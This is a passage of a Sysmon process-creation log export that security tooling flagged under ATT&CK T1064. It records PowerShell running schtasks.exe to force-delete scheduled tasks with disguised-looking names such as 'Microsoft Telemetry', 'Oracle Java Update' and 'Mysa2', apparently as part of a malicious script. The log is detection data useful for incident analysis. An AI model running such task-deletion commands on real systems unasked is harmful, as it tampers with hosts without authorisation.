+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.808754200Z"",""eventRecordID"":""2479"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.806\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010d8701e00}\r\nProcessId: 7984\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.806"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010d8701e00}"",""processId"":""7984"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.885",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.775
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010db6e1e00}
+ProcessId: 7088
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.778006900Z"",""eventRecordID"":""2478"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.775\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010db6e1e00}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.775"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010db6e1e00}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.868",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.743
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010046d1e00}
+ProcessId: 5308
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.746413500Z"",""eventRecordID"":""2477"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.743\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010046d1e00}\r\nProcessId: 5308\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.743"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010046d1e00}"",""processId"":""5308"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.854",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.711
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010246b1e00}
+ProcessId: 7776
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.713765200Z"",""eventRecordID"":""2476"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.711\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-0010246b1e00}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.711"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-0010246b1e00}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.838",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.677
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-00100a691e00}
+ProcessId: 7584
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.680964100Z"",""eventRecordID"":""2475"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.677\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-00100a691e00}\r\nProcessId: 7584\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.677"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-00100a691e00}"",""processId"":""7584"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.821",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.641
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001028671e00}
+ProcessId: 5384
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
+ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}
+ParentProcessId: 6056
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:03.648464000Z"",""eventRecordID"":""2474"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:03.641\r\nProcessGuid: {df9fc3d3-b37b-5ecf-0000-001028671e00}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:03.641"",""processGuid"":""{df9fc3d3-b37b-5ecf-0000-001028671e00}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}",
+"May 29, 2020 @ 14:18:31.808",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create:
+RuleName: 
+UtcTime: 2020-05-28 12:50:03.580
+ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001054651e00}
+ProcessId: 6012
+Image: C:\Windows\System32\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F
+CurrentDirectory: C:\Users\John Williams\Documents\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}
+LogonId: 0x375FD
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313
